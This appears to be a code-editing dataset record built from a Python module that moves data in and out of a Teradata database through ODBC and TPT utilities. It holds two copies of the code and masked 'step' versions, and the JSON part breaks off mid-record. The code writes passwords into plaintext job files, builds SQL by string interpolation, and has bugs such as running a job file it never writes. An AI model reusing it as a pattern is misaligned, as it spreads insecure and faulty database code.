def td_download(query='', bd='tdsb15.cgs.sbrf.ru', username='', password='',
fast=False, return_df=False, csv=True, chunksize=100000):
"""
Функция возвращает данные из ТД: путь к csv или датафрейм.
fast=True - использовать утилиты ТД, False - ODBC;
return_df - вернуть датафрейм;
csv - записать данные в файл при fast=False;
chunksize - размер бача для ODBC;
query должен содержать where, чтобы выгрузить название столбцов из БД
"""
local_seed = str(random.randint(0, 1000000))
query = query.replace('\n', ' ')
if not fast:
session = get_session(bd, username, password)
frame = sql2df(query, session, chunksize=chunksize)
session.close()
if return_df:
return frame
else:
path_to_file = os.path.join(os.getcwd(), 'data', 'input_' +
local_seed)
if csv:
filename = path_to_file + '.csv'
frame.to_csv(filename, sep=';', index=False, encoding='utf8')
return filename
else:
dump(frame, path_to_file)
return path_to_file
else:
check_config()
query = query.replace("'", "''")
path_to_folder = os.path.join(os.getcwd(), 'data', 'input_' +
local_seed)
if os.path.exists(path_to_folder):
shutil.rmtree(path_to_folder)
os.mkdir(path_to_folder)
else:
os.mkdir(path_to_folder)
path_to_file = os.path.join(path_to_folder, 'dataset.csv')
open(path_to_file, 'w').close()
txt = (
"""SourceTdpId = '%s'
,SourceUserName = '%s'
,SourceUserPassword = '%s'
,DDLPrivateLogName = 'ddlprivate.log'
,ExportPrivateLogName = 'exportprivate.log'
,TargetErrorList = ['3807']
,TargetFileName = '%s'
,TargetFormat = 'delimited'
,TargetTextDelimiter = ';'
,TargetOpenMode = 'write'
,SelectStmt = '%s' """
% (bd, username, password, path_to_file, query))
qtxt = """USING CHAR SET UTF-8
DEFINE JOB qstart2
(
APPLY TO OPERATOR ($FILE_WRITER)
SELECT * FROM OPERATOR($EXPORT);
);"""
with open(path_to_folder + '/qstart2.txt', 'w+') as f:
f.write(qtxt)
with open(path_to_folder + '/jobvars.txt', 'w+') as f:
f.write(txt)
p = subprocess.run(shlex.split(
f'tbuild -f {path_to_folder}/tdd.txt -v {path_to_folder}/jobvars.txt -j tdd_{str(local_seed)}'
), stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
query = query.replace('\n', ' ').replace("''", "'")
query = query.lower()
query_list = query.split('where')
if len(query_list) == 2:
columns_query = ' where 1=0 and '.join(query_list)
session = get_session(bd, username, password)
columns_names = pd.read_sql(columns_query, session).columns.tolist(
)
session.close()
else:
print("Coudn't load columns names")
columns_names = None
if not return_df:
if columns_names:
with open(path_to_folder + '/columns_names.txt', 'w') as f:
f.write('\n'.join(columns_names))
return path_to_file
else:
if columns_names:
frame = pd.read_csv(path_to_file, names=columns_names,
delimiter=';')
else:
frame = pd.read_csv(path_to_file, header=None, delimiter=';')
return frame
def py2td(x):
"""Функция вставляет пропуски и корректирует тип данных под ТД"""
x_type = type(x)
if x_type == float:
if x % 1 == 0:
return int(x)
else:
return x
elif x == 'null':
return None
else:
return x
def td_import(username='', password='', bd='tdsb15.cgs.sbrf.ru', tbl_name=
'', schema='SBX_RETAIL_MP_PFM', loadframe=True, df=None, path_to_file=
None, fast=False, batch_size=12000, max_sessions=6, buffersize=524288):
"""
Функция записывате данные в ТД через утилиты или ODBC
"""
table = schema + '.' + tbl_name
if not fast:
if not loadframe:
df = pd.read_csv(path_to_file, sep=';', encoding='utf8', index=
False)
n_iters = len(df) // batch_size + (len(df) % batch_size > 0)
df_dict = df.to_dict('records')
session = get_session(bd, username, password)
for i in tqdm(range(n_iters), total=n_iters):
session.executemany(
f"INSERT INTO {table} VALUES ({','.join(list('?' * df.shape[1]))})"
, [list(row.values()) for row in df_dict[i * batch_size:i *
batch_size + batch_size]], batch=True)
session.close()
else:
check_config()
local_seed = str(random.randint(0, 1000000))
path_to_folder = os.path.join(os.getcwd(), 'data', 'output_' +
local_seed)
if os.path.exists(path_to_folder):
shutil.rmtree(path_to_folder)
else:
os.mkdir(path_to_folder)
if loadframe:
converted = df.replace(np.NaN, '').astype(str)
path_to_file = path_to_folder + '/tmp.csv'
converted.to_csv(path_to_file, index=False, header=False, sep=
';', encoding='utf8')
converted_len = converted.apply(lambda x: x.str.encode('utf-8')
.apply(len)).max().to_dict()
else:
converted_len = pd.read_csv(path_to_file, sep=';', dtype='str',
header=None, encoding='utf8', low_memory=False, nrows=100000)
columns_query = f'select * from {table} where 1=0'
session = get_session(bd, username, password)
columns_names = pd.read_sql(columns_query, session).columns.tolist(
)
session.close()
shutil.copy(path_to_file, path_to_folder + '/tmp.csv')
converted_len.columns = columns_names
converted_len = converted_len.apply(lambda x: x.str.encode(
'utf-8').apply(len)).max().to_dict()
td_temp_table = table + '_tmp_' + local_seed
session = get_session(bd, username, password)
session.execute(
f'create multiset table {td_temp_table} as {table} with no data no primary index'
)
session.close()
txt = f"""USING CHARACTER SET UTF8
DEFINE JOB teradata_upload
Description 'Fastload script'
(
DEFINE OPERATOR Load_operator
TYPE LOAD
SCHEMA *
ATTRIBUTES
(
VARCHAR TdPid='{bd}',
VARCHAR UserName='{username}',
VARCHAR UserPassWord='{password}',
VARCHAR TargetTable='{td_temp_table}',
VARCHAR LogTable='{schema}.usr_tpt_log',
VARCHAR DateForm='AnsiDate',
INTEGER MaxSessions={max_sessions}
);
DEFINE SCHEMA Define_Employee_Schema
(
{','.join(f'{key} VARCHAR({max(1, value * 2)})' for key, value in converted_len.items())}
);
DEFINE OPERATOR Producer_File_Detail
TYPE DATACONNECTOR PRODUCER
SCHEMA Define_Employee_Schema
ATTRIBUTES
(
VARCHAR DirectoryPath='{path_to_folder}/'
, VARCHAR FileName='tmp.csv'
, VARCHAR TextDelimiter=';'
, VARCHAR QuotedData = 'Optional'
, VARCHAR OpenQuoteMark = '"'
, VARCHAR CloseQuoteMark = '"'
, VARCHAR Format='Delimited'
, VARCHAR OpenMode='Read'
, VARCHAR INDICATORMODE='N'
, INTEGER BUFFERSIZE = {buffersize}
);
APPLY
(
'INSERT INTO {td_temp_table}({','.join(f'{key}' for key, value in converted_len.items())}) VALUES (:{',:'.join(f'{key}' for key, value in converted_len.items())});'
)
TO OPERATOR(Load_operator)
SELECT * FROM OPERATOR (Producer_File_Detail);
);"""
with open(path_to_folder + '/load_code.tpt', 'w+') as f:
f.write(txt)
p = subprocess.Popen(shlex.split(
f'tbuild -f {path_to_folder}/load_code.tpt -L {path_to_folder}'))
p.wait()
print('Merging in Teradata... \r', end='', flush=True)
session = get_session(bd, username, password)
session.execute(f'insert into {table} sel * from {td_temp_table}')
session.close()
print('Cleaning... \r', end='', flush=True)
session = get_session(bd, username, password)
session.execute(f'drop table {td_temp_table}')
session.close()
shutil.rmtree(path_to_folder)
print('Done!')
<|reserved_special_token_1|>
import os
import numpy as np
import pandas as pd
import random
import platform
import subprocess
import shlex
import teradata
from joblib import dump
import shutil
from tqdm import tqdm
def get_session(db, usr, pwd):
"""Функция устанавливает соединение с ТД и возвращает сессию"""
if platform.system() == 'Windows':
driver = 'Teradata'
else:
driver = 'Teradata Database ODBC Driver 16.20'
udaExec = teradata.UdaExec(appName='DataLoad', version='0.1', logConsole=False)
session = udaExec.connect(method='odbc',
system=db, # Сервер ТД из файла
username=usr, # Логин TD
password=pwd, # Пароль TD
driver = driver,
charset='UTF8',
autoCommit='True',
USEREGIONALSETTINGS='N',
transactionMode = 'TERADATA'
)
return session
def sql2df(query, session, chunksize=100000):
""" Функция грузит из терадаты данные в батчах по 100к и склеивает их в одну таблицу """
db = pd.read_sql(query, session, chunksize=chunksize)
data = pd.DataFrame()
for x in tqdm(db):
data = pd.concat([data, x])
return data
def check_config():
""" .twbcfg.ini to root path """
path = os.path.expanduser("~")
config_path = os.path.join(path, ".twbcfg.ini")
log_path = os.path.join(path, "tmp", "teradata_logs")
if not os.path.exists(config_path):
if not os.path.exists(log_path):
os.mkdir(log_path)
config = f'''CheckpointDirectory='{log_path}'
LogDirectory='{log_path}' '''
with open(config_path, 'w') as f:
f.write(config)
def td_download(query="",
bd="tdsb15.cgs.sbrf.ru",
username="", password="",
fast=False, return_df=False, csv=True,
chunksize=100000):
"""
Функция возвращает данные из ТД: путь к csv или датафрейм.
fast=True - использовать утилиты ТД, False - ODBC;
return_df - вернуть датафрейм;
csv - записать данные в файл при fast=False;
chunksize - размер бача для ODBC;
query должен содержать where, чтобы выгрузить название столбцов из БД
"""
local_seed = str(random.randint(0, 1000000))
query = query.replace("\n", " ")
if not fast:
# Teradata python package
session = get_session(bd, username, password)
frame = sql2df(query, session, chunksize=chunksize)
session.close()
if return_df:
return frame
else:
path_to_file = os.path.join(os.getcwd(), 'data', 'input_' + local_seed)
if csv:
filename = path_to_file + ".csv"
frame.to_csv(filename, sep=';', index=False, encoding="utf8")
return filename
else:
dump(frame, path_to_file)
return path_to_file
else:
# FastLoad
check_config()
query = query.replace("'", "''") # prepair query for FastLoad
path_to_folder = os.path.join(os.getcwd(), 'data', 'input_' + local_seed)
if os.path.exists(path_to_folder):
shutil.rmtree(path_to_folder)
os.mkdir(path_to_folder)
else:
os.mkdir(path_to_folder)
path_to_file = os.path.join(path_to_folder, 'dataset.csv')
open(path_to_file, 'w').close()
# Create utility files
txt = '''SourceTdpId = '%s'
,SourceUserName = '%s'
,SourceUserPassword = '%s'
,DDLPrivateLogName = 'ddlprivate.log'
,ExportPrivateLogName = 'exportprivate.log'
,TargetErrorList = ['3807']
,TargetFileName = '%s'
,TargetFormat = 'delimited'
,TargetTextDelimiter = ';'
,TargetOpenMode = 'write'
,SelectStmt = '%s' ''' % (bd, username, password, path_to_file, query)
qtxt = '''USING CHAR SET UTF-8
DEFINE JOB qstart2
(
APPLY TO OPERATOR ($FILE_WRITER)
SELECT * FROM OPERATOR($EXPORT);
);'''
with open(path_to_folder + '/qstart2.txt', 'w+') as f:
f.write(qtxt)
with open(path_to_folder + '/jobvars.txt', 'w+') as f:
f.write(txt)
# run FastLoad
# p = subprocess.Popen(
# shlex.split(f"tbuild -f {path_to_folder}/qstart2.txt -v {path_to_folder}/jobvars.txt -j qstart2")
# )
# p.wait()
p = subprocess.run(
shlex.split(f"tbuild -f {path_to_folder}/tdd.txt -v {path_to_folder}/jobvars.txt -j tdd_{str(local_seed)}"), stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
# columns names
query = query.replace("\n", " ").replace("''","'")
query = query.lower()
query_list = query.split("where")
if len(query_list) == 2:
columns_query = " where 1=0 and ".join(query_list)
session = get_session(bd, username, password)
columns_names = pd.read_sql(columns_query, session).columns.tolist()
session.close()
else:
print("Coudn't load columns names")
columns_names = None
if not return_df:
if columns_names:
with open(path_to_folder + '/columns_names.txt', 'w') as f:
f.write("\n".join(columns_names))
return path_to_file
else:
if columns_names:
frame = pd.read_csv(path_to_file, names=columns_names, delimiter=';')
else:
frame = pd.read_csv(path_to_file, header=None, delimiter=';')
return frame
def py2td(x):
"""Функция вставляет пропуски и корректирует тип данных под ТД"""
x_type = type(x)
if x_type == float:
if x % 1 == 0:
return int(x)
else:
return x
elif x == 'null':
return None
else:
return x
def td_import(
username="", password="",
bd="tdsb15.cgs.sbrf.ru", tbl_name="",
schema="SBX_RETAIL_MP_PFM",
loadframe=True, df=None, path_to_file=None, fast=False,
batch_size=12000, max_sessions=6, buffersize=524288,
):
"""
Функция записывате данные в ТД через утилиты или ODBC
"""
table = schema + "." + tbl_name
if not fast:
if not loadframe:
df = pd.read_csv(path_to_file, sep=';', encoding='utf8', index=False)
# insert
n_iters = len(df) // batch_size + (len(df) % batch_size > 0)
df_dict = df.to_dict('records')
session = get_session(bd, username, password)
for i in tqdm(range(n_iters), total=n_iters):
session.executemany(
f"INSERT INTO {table} VALUES ({','.join(list('?' * df.shape[1]))})",
[list(row.values()) for row in df_dict[i * batch_size:i * batch_size + batch_size]],
batch=True
)
session.close()
else:
check_config()
local_seed = str(random.randint(0, 1000000))
path_to_folder = os.path.join(os.getcwd(), "data", "output_" + local_seed)
if os.path.exists(path_to_folder):
shutil.rmtree(path_to_folder)
else:
os.mkdir(path_to_folder)
if loadframe:
converted = df.replace(np.NaN, '').astype(str)
path_to_file = path_to_folder + '/tmp.csv'
converted.to_csv(path_to_file, index=False, header=False, sep=";", encoding="utf8")
converted_len = converted.apply(lambda x: x.str.encode('utf-8').apply(len)).max().to_dict()
else:
converted_len = pd.read_csv(path_to_file, sep=';', dtype="str", header=None, encoding="utf8",
low_memory=False, nrows=100000)
columns_query = f"select * from {table} where 1=0"
session = get_session(bd, username, password)
columns_names = pd.read_sql(columns_query, session).columns.tolist()
session.close()
shutil.copy(path_to_file, path_to_folder + "/tmp.csv") # cp file for correct working Change to move&
converted_len.columns = columns_names
converted_len = converted_len.apply(lambda x: x.str.encode('utf-8').apply(len)).max().to_dict()
# create empty tmp table
td_temp_table = table + "_tmp_" + local_seed # change schema
session = get_session(bd, username, password)
session.execute(
f"create multiset table {td_temp_table} as {table} with no data no primary index"
)
session.close()
# Create utility file
txt = f"""USING CHARACTER SET UTF8
DEFINE JOB teradata_upload
Description 'Fastload script'
(
DEFINE OPERATOR Load_operator
TYPE LOAD
SCHEMA *
ATTRIBUTES
(
VARCHAR TdPid='{bd}',
VARCHAR UserName='{username}',
VARCHAR UserPassWord='{password}',
VARCHAR TargetTable='{td_temp_table}',
VARCHAR LogTable='{schema}.usr_tpt_log',
VARCHAR DateForm='AnsiDate',
INTEGER MaxSessions={max_sessions}
);
DEFINE SCHEMA Define_Employee_Schema
(
{','.join(f'{key} VARCHAR({max(1, value*2)})' for key, value in converted_len.items())}
);
DEFINE OPERATOR Producer_File_Detail
TYPE DATACONNECTOR PRODUCER
SCHEMA Define_Employee_Schema
ATTRIBUTES
(
VARCHAR DirectoryPath='{path_to_folder}/'
, VARCHAR FileName='tmp.csv'
, VARCHAR TextDelimiter=';'
, VARCHAR QuotedData = 'Optional'
, VARCHAR OpenQuoteMark = '"'
, VARCHAR CloseQuoteMark = '"'
, VARCHAR Format='Delimited'
, VARCHAR OpenMode='Read'
, VARCHAR INDICATORMODE='N'
, INTEGER BUFFERSIZE = {buffersize}
);
APPLY
(
'INSERT INTO {td_temp_table}({','.join(
f'{key}' for key, value in converted_len.items())}) VALUES (:{',:'.join(
f'{key}' for key, value in converted_len.items())});'
)
TO OPERATOR(Load_operator)
SELECT * FROM OPERATOR (Producer_File_Detail);
);"""
with open(path_to_folder + '/load_code.tpt', 'w+') as f:
f.write(txt)
# Start TPT load
p = subprocess.Popen(
shlex.split(f"tbuild -f {path_to_folder}/load_code.tpt -L {path_to_folder}")
)
p.wait()
# Merge
print("Merging in Teradata... \r", end='', flush=True)
session = get_session(bd, username, password)
session.execute(f"insert into {table} sel * from {td_temp_table}")
session.close()
# Drop temporary table
print("Cleaning... \r", end='', flush=True)
session = get_session(bd, username, password)
session.execute(f"drop table {td_temp_table}")
session.close()
# Cleanup
shutil.rmtree(path_to_folder)
print("Done!")
|
flexible
|
{
"blob_id": "a05c94ae0ee41cfef5687f741e07a54ae793e40d",
"index": 2183,
"step-1": "<mask token>\n\n\ndef get_session(db, usr, pwd):\n \"\"\"Функция устанавливает соединение с ТД и возвращает сессию\"\"\"\n if platform.system() == 'Windows':\n driver = 'Teradata'\n else:\n driver = 'Teradata Database ODBC Driver 16.20'\n udaExec = teradata.UdaExec(appName='DataLoad', version='0.1',\n logConsole=False)\n session = udaExec.connect(method='odbc', system=db, username=usr,\n password=pwd, driver=driver, charset='UTF8', autoCommit='True',\n USEREGIONALSETTINGS='N', transactionMode='TERADATA')\n return session\n\n\ndef sql2df(query, session, chunksize=100000):\n \"\"\" Функция грузит из терадаты данные в батчах по 100к и склеивает их в одну таблицу \"\"\"\n db = pd.read_sql(query, session, chunksize=chunksize)\n data = pd.DataFrame()\n for x in tqdm(db):\n data = pd.concat([data, x])\n return data\n\n\ndef check_config():\n \"\"\" .twbcfg.ini to root path \"\"\"\n path = os.path.expanduser('~')\n config_path = os.path.join(path, '.twbcfg.ini')\n log_path = os.path.join(path, 'tmp', 'teradata_logs')\n if not os.path.exists(config_path):\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n config = (\n f\"CheckpointDirectory='{log_path}' \\n LogDirectory='{log_path}' \"\n )\n with open(config_path, 'w') as f:\n f.write(config)\n\n\n<mask token>\n\n\ndef py2td(x):\n \"\"\"Функция вставляет пропуски и корректирует тип данных под ТД\"\"\"\n x_type = type(x)\n if x_type == float:\n if x % 1 == 0:\n return int(x)\n else:\n return x\n elif x == 'null':\n return None\n else:\n return x\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_session(db, usr, pwd):\n \"\"\"Функция устанавливает соединение с ТД и возвращает сессию\"\"\"\n if platform.system() == 'Windows':\n driver = 'Teradata'\n else:\n driver = 'Teradata Database ODBC Driver 16.20'\n udaExec = teradata.UdaExec(appName='DataLoad', version='0.1',\n logConsole=False)\n session = udaExec.connect(method='odbc', system=db, username=usr,\n password=pwd, driver=driver, charset='UTF8', autoCommit='True',\n USEREGIONALSETTINGS='N', transactionMode='TERADATA')\n return session\n\n\ndef sql2df(query, session, chunksize=100000):\n \"\"\" Функция грузит из терадаты данные в батчах по 100к и склеивает их в одну таблицу \"\"\"\n db = pd.read_sql(query, session, chunksize=chunksize)\n data = pd.DataFrame()\n for x in tqdm(db):\n data = pd.concat([data, x])\n return data\n\n\ndef check_config():\n \"\"\" .twbcfg.ini to root path \"\"\"\n path = os.path.expanduser('~')\n config_path = os.path.join(path, '.twbcfg.ini')\n log_path = os.path.join(path, 'tmp', 'teradata_logs')\n if not os.path.exists(config_path):\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n config = (\n f\"CheckpointDirectory='{log_path}' \\n LogDirectory='{log_path}' \"\n )\n with open(config_path, 'w') as f:\n f.write(config)\n\n\n<mask token>\n\n\ndef py2td(x):\n \"\"\"Функция вставляет пропуски и корректирует тип данных под ТД\"\"\"\n x_type = type(x)\n if x_type == float:\n if x % 1 == 0:\n return int(x)\n else:\n return x\n elif x == 'null':\n return None\n else:\n return x\n\n\ndef td_import(username='', password='', bd='tdsb15.cgs.sbrf.ru', tbl_name=\n '', schema='SBX_RETAIL_MP_PFM', loadframe=True, df=None, path_to_file=\n None, fast=False, batch_size=12000, max_sessions=6, buffersize=524288):\n \"\"\"\n Функция записывате данные в ТД через утилиты или ODBC\n\n \"\"\"\n table = schema + '.' + tbl_name\n if not fast:\n if not loadframe:\n df = pd.read_csv(path_to_file, sep=';', encoding='utf8', index=\n False)\n n_iters = len(df) // batch_size + (len(df) % batch_size > 0)\n df_dict = df.to_dict('records')\n session = get_session(bd, username, password)\n for i in tqdm(range(n_iters), total=n_iters):\n session.executemany(\n f\"INSERT INTO {table} VALUES ({','.join(list('?' * df.shape[1]))})\"\n , [list(row.values()) for row in df_dict[i * batch_size:i *\n batch_size + batch_size]], batch=True)\n session.close()\n else:\n check_config()\n local_seed = str(random.randint(0, 1000000))\n path_to_folder = os.path.join(os.getcwd(), 'data', 'output_' +\n local_seed)\n if os.path.exists(path_to_folder):\n shutil.rmtree(path_to_folder)\n else:\n os.mkdir(path_to_folder)\n if loadframe:\n converted = df.replace(np.NaN, '').astype(str)\n path_to_file = path_to_folder + '/tmp.csv'\n converted.to_csv(path_to_file, index=False, header=False, sep=\n ';', encoding='utf8')\n converted_len = converted.apply(lambda x: x.str.encode('utf-8')\n .apply(len)).max().to_dict()\n else:\n converted_len = pd.read_csv(path_to_file, sep=';', dtype='str',\n header=None, encoding='utf8', low_memory=False, nrows=100000)\n columns_query = f'select * from {table} where 1=0'\n session = get_session(bd, username, password)\n columns_names = pd.read_sql(columns_query, session).columns.tolist(\n )\n session.close()\n shutil.copy(path_to_file, path_to_folder + '/tmp.csv')\n converted_len.columns = columns_names\n converted_len = converted_len.apply(lambda x: x.str.encode(\n 'utf-8').apply(len)).max().to_dict()\n td_temp_table = table + '_tmp_' + local_seed\n session = get_session(bd, username, password)\n session.execute(\n f'create multiset table {td_temp_table} as {table} with no data no primary index'\n )\n session.close()\n txt = f\"\"\"USING CHARACTER SET UTF8\n DEFINE JOB teradata_upload\n Description 'Fastload script'\n (\n DEFINE OPERATOR Load_operator\n TYPE LOAD\n SCHEMA *\n ATTRIBUTES\n (\n VARCHAR TdPid='{bd}',\n VARCHAR UserName='{username}',\n VARCHAR UserPassWord='{password}',\n VARCHAR TargetTable='{td_temp_table}',\n VARCHAR LogTable='{schema}.usr_tpt_log',\n VARCHAR DateForm='AnsiDate',\n INTEGER MaxSessions={max_sessions}\n );\n\n DEFINE SCHEMA Define_Employee_Schema\n (\n {','.join(f'{key} VARCHAR({max(1, value * 2)})' for key, value in converted_len.items())} \n );\n\n DEFINE OPERATOR Producer_File_Detail\n TYPE DATACONNECTOR PRODUCER\n SCHEMA Define_Employee_Schema\n ATTRIBUTES\n (\n VARCHAR DirectoryPath='{path_to_folder}/'\n , VARCHAR FileName='tmp.csv'\n , VARCHAR TextDelimiter=';'\n , VARCHAR QuotedData = 'Optional'\n , VARCHAR OpenQuoteMark = '\"'\n , VARCHAR CloseQuoteMark = '\"'\n , VARCHAR Format='Delimited'\n , VARCHAR OpenMode='Read'\n , VARCHAR INDICATORMODE='N'\n , INTEGER BUFFERSIZE = {buffersize}\n );\n\n APPLY\n (\n 'INSERT INTO {td_temp_table}({','.join(f'{key}' for key, value in converted_len.items())}) VALUES (:{',:'.join(f'{key}' for key, value in converted_len.items())});'\n )\n TO OPERATOR(Load_operator)\n\n SELECT * FROM OPERATOR (Producer_File_Detail);\n );\"\"\"\n with open(path_to_folder + '/load_code.tpt', 'w+') as f:\n f.write(txt)\n p = subprocess.Popen(shlex.split(\n f'tbuild -f {path_to_folder}/load_code.tpt -L {path_to_folder}'))\n p.wait()\n print('Merging in Teradata... \\r', end='', flush=True)\n session = get_session(bd, username, password)\n session.execute(f'insert into {table} sel * from {td_temp_table}')\n session.close()\n print('Cleaning... \\r', end='', flush=True)\n session = get_session(bd, username, password)\n session.execute(f'drop table {td_temp_table}')\n session.close()\n shutil.rmtree(path_to_folder)\n print('Done!')\n",
"step-3": "<mask token>\n\n\ndef get_session(db, usr, pwd):\n \"\"\"Функция устанавливает соединение с ТД и возвращает сессию\"\"\"\n if platform.system() == 'Windows':\n driver = 'Teradata'\n else:\n driver = 'Teradata Database ODBC Driver 16.20'\n udaExec = teradata.UdaExec(appName='DataLoad', version='0.1',\n logConsole=False)\n session = udaExec.connect(method='odbc', system=db, username=usr,\n password=pwd, driver=driver, charset='UTF8', autoCommit='True',\n USEREGIONALSETTINGS='N', transactionMode='TERADATA')\n return session\n\n\ndef sql2df(query, session, chunksize=100000):\n \"\"\" Функция грузит из терадаты данные в батчах по 100к и склеивает их в одну таблицу \"\"\"\n db = pd.read_sql(query, session, chunksize=chunksize)\n data = pd.DataFrame()\n for x in tqdm(db):\n data = pd.concat([data, x])\n return data\n\n\ndef check_config():\n \"\"\" .twbcfg.ini to root path \"\"\"\n path = os.path.expanduser('~')\n config_path = os.path.join(path, '.twbcfg.ini')\n log_path = os.path.join(path, 'tmp', 'teradata_logs')\n if not os.path.exists(config_path):\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n config = (\n f\"CheckpointDirectory='{log_path}' \\n LogDirectory='{log_path}' \"\n )\n with open(config_path, 'w') as f:\n f.write(config)\n\n\ndef td_download(query='', bd='tdsb15.cgs.sbrf.ru', username='', password='',\n fast=False, return_df=False, csv=True, chunksize=100000):\n \"\"\"\n Функция возвращает данные из ТД: путь к csv или датафрейм.\n\n fast=True - использовать утилиты ТД, False - ODBC;\n return_df - вернуть датафрейм;\n csv - записать данные в файл при fast=False;\n chunksize - размер бача для ODBC;\n query должен содержать where, чтобы выгрузить название столбцов из БД\n\n \"\"\"\n local_seed = str(random.randint(0, 1000000))\n query = query.replace('\\n', ' ')\n if not fast:\n session = get_session(bd, username, password)\n frame = sql2df(query, session, chunksize=chunksize)\n session.close()\n if return_df:\n return frame\n else:\n path_to_file = os.path.join(os.getcwd(), 'data', 'input_' +\n local_seed)\n if csv:\n filename = path_to_file + '.csv'\n frame.to_csv(filename, sep=';', index=False, encoding='utf8')\n return filename\n else:\n dump(frame, path_to_file)\n return path_to_file\n else:\n check_config()\n query = query.replace(\"'\", \"''\")\n path_to_folder = os.path.join(os.getcwd(), 'data', 'input_' +\n local_seed)\n if os.path.exists(path_to_folder):\n shutil.rmtree(path_to_folder)\n os.mkdir(path_to_folder)\n else:\n os.mkdir(path_to_folder)\n path_to_file = os.path.join(path_to_folder, 'dataset.csv')\n open(path_to_file, 'w').close()\n txt = (\n \"\"\"SourceTdpId = '%s'\n ,SourceUserName = '%s' \n ,SourceUserPassword = '%s'\n ,DDLPrivateLogName = 'ddlprivate.log'\n ,ExportPrivateLogName = 'exportprivate.log'\n ,TargetErrorList = ['3807']\n ,TargetFileName = '%s'\n ,TargetFormat = 'delimited'\n ,TargetTextDelimiter = ';'\n ,TargetOpenMode = 'write'\n ,SelectStmt = '%s' \"\"\"\n % (bd, username, password, path_to_file, query))\n qtxt = \"\"\"USING CHAR SET UTF-8\n DEFINE JOB qstart2\n (\n APPLY TO OPERATOR ($FILE_WRITER)\n SELECT * FROM OPERATOR($EXPORT);\n );\"\"\"\n with open(path_to_folder + '/qstart2.txt', 'w+') as f:\n f.write(qtxt)\n with open(path_to_folder + '/jobvars.txt', 'w+') as f:\n f.write(txt)\n p = subprocess.run(shlex.split(\n f'tbuild -f {path_to_folder}/tdd.txt -v {path_to_folder}/jobvars.txt -j tdd_{str(local_seed)}'\n ), stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n query = query.replace('\\n', ' ').replace(\"''\", \"'\")\n query = query.lower()\n query_list = query.split('where')\n if len(query_list) == 2:\n columns_query = ' where 1=0 and '.join(query_list)\n session = get_session(bd, username, password)\n columns_names = pd.read_sql(columns_query, session).columns.tolist(\n )\n session.close()\n else:\n print(\"Coudn't load columns names\")\n columns_names = None\n if not return_df:\n if columns_names:\n with open(path_to_folder + '/columns_names.txt', 'w') as f:\n f.write('\\n'.join(columns_names))\n return path_to_file\n else:\n if columns_names:\n frame = pd.read_csv(path_to_file, names=columns_names,\n delimiter=';')\n else:\n frame = pd.read_csv(path_to_file, header=None, delimiter=';')\n return frame\n\n\ndef py2td(x):\n \"\"\"Функция вставляет пропуски и корректирует тип данных под ТД\"\"\"\n x_type = type(x)\n if x_type == float:\n if x % 1 == 0:\n return int(x)\n else:\n return x\n elif x == 'null':\n return None\n else:\n return x\n\n\ndef td_import(username='', password='', bd='tdsb15.cgs.sbrf.ru', tbl_name=\n '', schema='SBX_RETAIL_MP_PFM', loadframe=True, df=None, path_to_file=\n None, fast=False, batch_size=12000, max_sessions=6, buffersize=524288):\n \"\"\"\n Функция записывате данные в ТД через утилиты или ODBC\n\n \"\"\"\n table = schema + '.' + tbl_name\n if not fast:\n if not loadframe:\n df = pd.read_csv(path_to_file, sep=';', encoding='utf8', index=\n False)\n n_iters = len(df) // batch_size + (len(df) % batch_size > 0)\n df_dict = df.to_dict('records')\n session = get_session(bd, username, password)\n for i in tqdm(range(n_iters), total=n_iters):\n session.executemany(\n f\"INSERT INTO {table} VALUES ({','.join(list('?' * df.shape[1]))})\"\n , [list(row.values()) for row in df_dict[i * batch_size:i *\n batch_size + batch_size]], batch=True)\n session.close()\n else:\n check_config()\n local_seed = str(random.randint(0, 1000000))\n path_to_folder = os.path.join(os.getcwd(), 'data', 'output_' +\n local_seed)\n if os.path.exists(path_to_folder):\n shutil.rmtree(path_to_folder)\n else:\n os.mkdir(path_to_folder)\n if loadframe:\n converted = df.replace(np.NaN, '').astype(str)\n path_to_file = path_to_folder + '/tmp.csv'\n converted.to_csv(path_to_file, index=False, header=False, sep=\n ';', encoding='utf8')\n converted_len = converted.apply(lambda x: x.str.encode('utf-8')\n .apply(len)).max().to_dict()\n else:\n converted_len = pd.read_csv(path_to_file, sep=';', dtype='str',\n header=None, encoding='utf8', low_memory=False, nrows=100000)\n columns_query = f'select * from {table} where 1=0'\n session = get_session(bd, username, password)\n columns_names = pd.read_sql(columns_query, session).columns.tolist(\n )\n session.close()\n shutil.copy(path_to_file, path_to_folder + '/tmp.csv')\n converted_len.columns = columns_names\n converted_len = converted_len.apply(lambda x: x.str.encode(\n 'utf-8').apply(len)).max().to_dict()\n td_temp_table = table + '_tmp_' + local_seed\n session = get_session(bd, username, password)\n session.execute(\n f'create multiset table {td_temp_table} as {table} with no data no primary index'\n )\n session.close()\n txt = f\"\"\"USING CHARACTER SET UTF8\n DEFINE JOB teradata_upload\n Description 'Fastload script'\n (\n DEFINE OPERATOR Load_operator\n TYPE LOAD\n SCHEMA *\n ATTRIBUTES\n (\n VARCHAR TdPid='{bd}',\n VARCHAR UserName='{username}',\n VARCHAR UserPassWord='{password}',\n VARCHAR TargetTable='{td_temp_table}',\n VARCHAR LogTable='{schema}.usr_tpt_log',\n VARCHAR DateForm='AnsiDate',\n INTEGER MaxSessions={max_sessions}\n );\n\n DEFINE SCHEMA Define_Employee_Schema\n (\n {','.join(f'{key} VARCHAR({max(1, value * 2)})' for key, value in converted_len.items())} \n );\n\n DEFINE OPERATOR Producer_File_Detail\n TYPE DATACONNECTOR PRODUCER\n SCHEMA Define_Employee_Schema\n ATTRIBUTES\n (\n VARCHAR DirectoryPath='{path_to_folder}/'\n , VARCHAR FileName='tmp.csv'\n , VARCHAR TextDelimiter=';'\n , VARCHAR QuotedData = 'Optional'\n , VARCHAR OpenQuoteMark = '\"'\n , VARCHAR CloseQuoteMark = '\"'\n , VARCHAR Format='Delimited'\n , VARCHAR OpenMode='Read'\n , VARCHAR INDICATORMODE='N'\n , INTEGER BUFFERSIZE = {buffersize}\n );\n\n APPLY\n (\n 'INSERT INTO {td_temp_table}({','.join(f'{key}' for key, value in converted_len.items())}) VALUES (:{',:'.join(f'{key}' for key, value in converted_len.items())});'\n )\n TO OPERATOR(Load_operator)\n\n SELECT * FROM OPERATOR 